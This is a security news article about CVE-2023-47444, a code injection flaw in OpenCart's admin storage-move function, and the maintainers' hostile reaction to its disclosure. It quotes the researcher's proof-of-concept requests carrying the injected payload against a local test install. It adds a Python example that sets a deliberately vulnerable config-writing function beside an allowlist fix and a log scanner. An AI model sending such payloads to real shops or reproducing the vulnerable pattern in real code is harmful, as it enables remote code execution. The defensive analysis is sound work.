Security Researcher Discloses OpenCart Vulnerability


A security researcher who goes by the name “0xbro” discovered a static code injection vulnerability in OpenCart that allows arbitrary untrusted data to be written to the config.php and admin/config.php files, which could result in remote code execution.

This vulnerability was assigned CVE-2023-47444 and a severity score of 8.8 (High).

However, the researcher's responsible disclosure to OpenCart was not received politely. The administrator, who goes by the name Daniel Kerr, responded to the report saying, “ur a f**kng time waster”.

CVE-2023-47444: Authenticated Static Code Injections in OpenCart

This vulnerability exists in OpenCart versions 4.0.0.0 to 4.0.2.3 and allows an authenticated user holding the common/security “access” and “modify” privileges to write untrusted arbitrary data to config.php and admin/config.php, which could result in remote code execution.

The flaw lies in two functions: one that moves the storage folder outside the application web root, and one that renames the secret admin path after installation.


Prerequisites and Proof of Concept

In order to exploit this vulnerability, the threat actor must possess valid credentials for the backend dashboard along with write permission on common/security. In addition, the admin/ folder must still be the default one and not renamed.

Proof-of-concept (Source: 0xbro)

As per the proof-of-concept for this vulnerability, two requests must be sent in sequence:

  1. route=common/security.storage&name=pwned');phpinfo();%23&path=&user_token=
  2. route=common/security.storage&name=pwned');phpinfo();%23&path=&user_token=&page=99

First Request

GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{"next":"http://127.0.0.1:8888/admin_secret/index.php?route=common/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned');phpinfo();#&path=/home/kali/Projects/OpenCart/4.0.2.3/&page=2"}

Second Request

GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{"success":"Success: Storage directory has been moved!"}
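The root cause of both the storage-move and the admin-rename function is the same: a request parameter is written straight into PHP source, so a value that closes the string literal and the define() call turns the rest of the parameter into code. The defence is to validate the parameter against a strict allowlist before it reaches config.php, and to watch access logs for requests to that route that carry anything else. The following Python script is an added example and not OpenCart's own code: it places the vulnerable interpolation pattern beside a hardened writer, and runs the same allowlist check over constructed access-log lines. The SAFE_NAME pattern, the exact define() line format and the log lines are assumptions; only the common/security.storage route and the payload shape come from the article above.

```python
"""Added example, not OpenCart's code: allowlist validation for the ``name``
parameter that the storage-move route writes into config.php, plus a scan of
access-log lines for requests that carry anything outside the allowlist.

Assumptions (labelled): SAFE_NAME is a hypothetical allowlist, not the rule
OpenCart enforces; the DIR_STORAGE define() line is illustrative; the log
lines are constructed, not captured from a real server.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Hypothetical allowlist for a directory name: letters, digits, '_' and '-'.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Route taken from the article's proof-of-concept. The admin-rename route is
# not named in the article, so it is not guessed here; add it when known.
SENSITIVE_ROUTES = {"common/security.storage"}

# Matches the request line inside a common-log-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_safe_name(name: str) -> bool:
    """True only if the whole name consists of allowlisted characters."""
    return SAFE_NAME.fullmatch(name) is not None


def render_storage_define_vulnerable(base_path: str, name: str) -> str:
    """The injection pattern: untrusted input interpolated straight into PHP
    source. A name such as pwned');phpinfo();# closes the literal and the
    define() call, and what follows is emitted as executable code."""
    return f"define('DIR_STORAGE', '{base_path.rstrip('/')}/{name}/');"


def render_storage_define(base_path: str, name: str) -> str:
    """Hardened form: reject anything outside the allowlist, then also escape
    the value for a PHP single-quoted literal as defence in depth."""
    if not is_safe_name(name):
        raise ValueError(f"refusing to write unsafe storage name: {name!r}")
    full = f"{base_path.rstrip('/')}/{name}/"
    escaped = full.replace("\\", "\\\\").replace("'", "\\'")
    return f"define('DIR_STORAGE', '{escaped}');"


def parse_query(query: str) -> dict:
    """Split a query string on '&' only. Older urllib.parse.parse_qs versions
    also split on ';', which would cut a payload like the article's in half
    and hide part of it from the check below."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def scan_access_log(lines):
    """Return (line_no, route, decoded_name) for every request to a sensitive
    route whose ``name`` parameter fails the allowlist."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        params = parse_query(urlsplit(match.group("target")).query)
        route = params.get("route", [""])[0]
        if route not in SENSITIVE_ROUTES:
            continue
        for name in params.get("name", []):
            if not is_safe_name(name):
                findings.append((line_no, route, name))
    return findings


# Constructed sample log lines (not from the article or a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Nov/2023:10:00:00 +0000] "GET /admin_secret/index.php?route=common/security.storage&name=storage_new&path=/var/www/&user_token=abc HTTP/1.1" 200 120',
    '127.0.0.1 - - [01/Nov/2023:10:00:05 +0000] "GET /admin_secret/index.php?route=common/security.storage&name=pwned%27);phpinfo();%23&path=/var/www/&user_token=abc HTTP/1.1" 200 120',
    '127.0.0.1 - - [01/Nov/2023:10:00:07 +0000] "GET /admin_secret/index.php?route=common/dashboard&user_token=abc HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", finding)
    print(render_storage_define("/var/www", "storage_new"))
```

Run against the constructed log, the scan flags only the second line, whose decoded name is the article's payload; the first line passes because storage_new is entirely within the allowlist, and the dashboard request is ignored because its route is not one that writes to config.php. The allowlist check is the real control; the escaping in the hardened writer only guards against a future relaxation of the pattern.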

Beyond that response, the OpenCart administrators also closed the pull request on GitHub, dismissing the issue as a “non-vulnerability”. The fix was nevertheless later merged into master.

A complete report on this vulnerability and OpenCart's response has been published, with full details of the proof-of-concept.



